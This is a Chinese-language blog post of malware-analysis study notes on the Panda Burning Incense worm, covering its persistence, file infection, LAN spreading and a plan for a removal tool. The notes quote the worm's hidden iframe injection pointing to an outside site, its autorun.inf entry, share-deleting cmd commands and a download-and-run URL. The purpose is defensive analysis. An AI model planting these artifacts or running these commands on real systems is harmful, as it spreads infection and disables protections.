病毒分析学习笔记-熊猫烧香
作者:互联网
熊猫烧香
分析病毒四步:
-
提取样本,模拟手工查杀的方式去进行分析
-
行为分析,使用监控工具行为分析
-
详细分析:使用OD和IDA动静结合方式分析恶意代码,尽可能找出恶意代码行为,及实现步骤
-
解决方案:报告和专杀工具
一般都是先中了病毒,再去杀毒,
提取样本第一时间手工清理或修复机器现场,之后再做分析
1.样本概况
1.1 样本信息
病毒名称: 熊猫烧香
所属家族:感染性病毒(Virus)/ 蠕虫病毒(Worm)
大小: 30001 bytes
修改时间: 2007年1月17日, 12:18:40
MD5: 512301C535C88255C9A252FDF70B7A03
SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870
CRC32: E334747C
病毒行为:
复制自身、感染PE文件、覆写PE文件、修改注册表自启动、结束杀软进程、删除杀软相关启动项。
1.2 测试环境及工具
测试环境:VMware WorkStation 16 PRO
工具:PCHunter、火绒剑、IDA、OD、ExeinfoPE
1.3 分析目标
分析病毒永久驻留方式,感染的方式,网络连接,病毒的恶意行为。
2.具体行为分析
2.1 主要行为
熊猫烧香主要行为如下:
-
文件操作:复制病毒、创建文件、感染文件等。
-
注册表操作:自启动、创建注册表项、删除杀软注册表项、隐藏文件等。
-
进程操作:遍历进程、跨进程读写、跨进程恢复线程、打开设备等。
-
网络操作:连接局域网传播、访问门户网址、与木马网址通讯等
2.1.1 文件操作
-
复制文件到C:\Windows\System32\drivers\spo0lsv.exe
-
在各个目录创建了Desktop.ini 文件,里面保存的是病毒创建的日期。
-
感染了大量文件,文件类型主要为exe和ini文件。
2.1.2 注册表操作
1.为自己创建了一个注册表项
HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spo0lsv_RASAPI32,在里面写入了很多信息,
2.病毒开机自启动,在
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\设置启动项 C:\WIndows\system32\drivers\spo0lsvs.exe。
3.通过
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue隐藏文件。
-
通过删除
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下的项来关闭杀毒软件自启动。
-
修改IE的代理服务和连接设置。
2.1.3 进程操作
-
遍历进程,可能是查找是否有杀软。
-
打开和创建进程,启动C:\Windows\system32\drivers\spo0lsv.exe
-
跨进程读写内存,读写C:\Windows\system32\drivers\spo0lsv.exe的内存
-
跨进程恢复线程,恢复C:\Windows\system32\drivers\spo0lsv.exe的线程,让其运行
-
打开设备,打开的是Nsi和Afd
-
查找窗口
2.1.4 网咯操作
-
连接了局域网的一些地址,主要通过139、445端口连接。
-
访问了一些门户网站:www.tom.com、www.163.com等
3.与一些网址进行数据交换,数据经过了加密传输。
2.1.5 威胁行为总结
通过分析监控的日志以及人肉之后,可以分析出样本的恶意行为:
-
自我复制样本到C盘,C:\Windows\system32\driver\目录下,启动C:\Windows\system32\drivers\spo0lsv.exe(样本)。
-
在每一个目录下创建了Desktop.ini文件,里面存放的是当前日期。
-
在C盘根目录下创建了autorun.inf文件,里面制定了自启动的文件为根目录下的setup.exe(样本)。
-
对程序目录下的exe进行了感染,图标变为exe,打开exe时,自动打开病毒。
-
设置注册表启动项为C:\Windows\system32\drivers\spo0lsv.exe(样本)
-
设置注册表键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue,隐藏文件不显示。
-
将注册表中杀毒软件启动项全部删除。
-
自己创建了一个注册表的项HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spo0lsv_RASAPI32,在其中写入了很多信息。
-
修改注册表项IE浏览器的代理和连接设置。
-
连接局域网的一些地址,访问外网的一些地址。
-
使用cmd命令关闭网络共享。cmd.exe /c net share C$/del /y 和 cmd.exe /c net share admin$ /del /y
2.2 恶意代码分析
2.1恶意代码树结构图
熊猫烧香主要分为三个模块:
1. 自我保护和自我复制
2. 感染文件
3. 病毒自我保护
2.2 恶意程序的代码分析片段
2.1.1 病毒主逻辑
在程序开始时比较字符串是否相等,不相等则退出,接着依次执行自我复制和自我保护、感染全盘文件和病毒自我保护。
2.1.2 自我复制
自我复制和自我保护功能如下图所示:
-
遍历进程”spo0lsv.exe”,通过创建进程快照方式遍历进程,然后判断是否是”spo0lsv.exe”,是的话就结束进程。
-
若是病毒母体,则将自身拷贝至”C:\Windows\system32\drivers\spo0lsv.exe”中。然后运行该文件,并退出本程序。
-
若不是病毒源程序:将驱动目录的病毒程序spo0lsv.exe删除,再将自身写入获取drivers目录的spo0lsv.exe程序中,然后退出进程,再启动获取drivers目录下的spo0lsv.exe.
2.1.3 感染文件
病毒感染文件的主要逻辑如图所示:
1. 全盘感染
1.1 遍历全盘,找出存在的盘符并保存。
1.2 遍历目录排除特殊文件夹,并生成感染标识Desktop_.ini文件,里面保存当前时间
1.3 对EXE、SCR、PIF、COM后缀的文件使用函数sub_407F00进行感染,,主要是将使用病毒文件替换源文件,然后再将源文件添加到病毒文件中。
1.4 对htm、html、asp、php、jsp、aspx后缀的文件,使用sub_4079CC函数进行感染,主要是将<iframe src=http://www.ac86.cn/66/index.htm width=”0”height=”0”></iframe>写入文件末尾。
2. 定时器方式感染
2.1 设置一个定时器,判断C盘根路径下setup.exp和autorun.inf文件是否存在,没有则创建这两个文件,将病毒自身复制到setup.exe中,在autorun.inf中写入”[AutoRun] noPEN=setup.exe shell\Auto\command =setup.exe ”
3. 局域网感染
3.1建立TCP客户端,然后当病毒发现能连接到到局域网主机的139端口或445端口时,匹配管理员弱口令密码,连接成功后将病毒上传。
2.1.4 病毒自我保护保护
熊猫烧香通过结束杀毒软件、设置自启动、隐藏文件、从网页下载代码并执行、删除网络共享、停止和删除杀软服务,删除杀软注册表启动项的方式对自己进行保护。
1. 结束杀软、自启动和隐藏文件
1.通过访问令牌提升权限。
-
通过遍历窗口,然后发送WM_QUIT的方式结束杀毒软件。
-
通过遍历进程结束杀毒软件。
-
通过注册表设置自启动和隐藏文件
2. 从网页读取病毒源码
从网站http://wangma.9966.org/down.txt读取病毒源码并运行。
3. 删除网络共享
使用以下几条命令来删除网络共享:
-
cmd.exe /c net share $ /del /y
-
cmd.exe /c net share admin$ /del /y
4.停止和删除杀软服务,删除杀软注册表启动项
停止杀软服务,删除杀软服务和删除杀软注册表启动项
3.解决方案
3.1 提取病毒的特征,利用杀毒软件查杀
病毒特征:
1. 字符串:
”whboy”、”xboy”、”Desktop_.ini”、”spo0lsv.exe”等
2. 网络地址:
http://wangma.9966.org/down.txt
3.2工具查杀步骤及查杀思路
根据刚刚的详细分析可以针对该病毒行为,编写专杀工具来杀掉熊猫烧香病毒和恢复被感染文件,恢复被篡改的注册表项。思路如下,详细代码请见附录
3.1.1 专杀工具编写思路
1. 结束病毒进程
由之前分析可知病毒进程名称为spo0lsv.exe,故通过遍历进程的方式,获取进程名称进行比对,然后结束进程即可。
2. 恢复注册表
熊猫烧香对注册表的更改主要是设置熊猫烧香开机启动、修改文件隐藏属性和创建了一个熊猫烧香的注册表项。故我们针对其进行修改即可,删除熊猫烧香的自启动,改正文件隐藏属性和删除熊猫烧香创建的注册表项。
3. 删除病毒文件
删除熊猫烧香创建的一些感染标识文件、驱动目录下的病毒文件和根路径下的setup.exe和autorun.inf文件.
4. 恢复被
感染文件
根据被感染文件的类型恢复被感染文件,对于exe、scr、com和pif类文件,先获取文件大小,然后从文件末尾读出感染标识中存储的源文件的大小,再将源文件读出并写回即可恢复。对于htm、html、asp、php、jsp和aspx文件,只需将文件末尾的网址删除即可。
标签:文件,exe,删除,熊猫,笔记,spo0lsv,烧香,注册表,病毒 来源: https://www.cnblogs.com/Link-Start/p/15469132.html